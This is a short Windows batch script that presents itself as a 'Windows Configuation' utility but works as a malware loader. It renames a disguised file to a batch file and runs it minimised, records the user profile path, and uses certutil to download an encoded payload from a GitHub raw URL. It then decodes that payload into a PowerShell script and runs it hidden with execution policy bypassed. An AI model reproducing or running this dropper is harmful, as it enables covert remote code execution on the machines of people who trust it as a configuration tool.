@echo off 
echo . 
color 1a

title W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N
echo W  I  N  D  O  W  S    C  O  N  F  I  G  U  A  T  I  O  N 

IF EXIST 6pylooper.uiaq (
	ren 6pylooper.uiaq 6pylooper.bat
	start /min 6pylooper.bat
) ELSE (
	echo jade
)

timeout /t 6

:orange

IF EXIST up-query.altp (
	certutil.exe -decode .\up-query.altp up-query.ps1
	echo "%userprofile%" >> up.txt || echo %userprofile% >> up.txt
	powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -NoExit -File up-query.ps1
	
) ELSE (
	certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/WernerLS/Treb/master/up-query.altp" up-query.altp
	goto orange
)
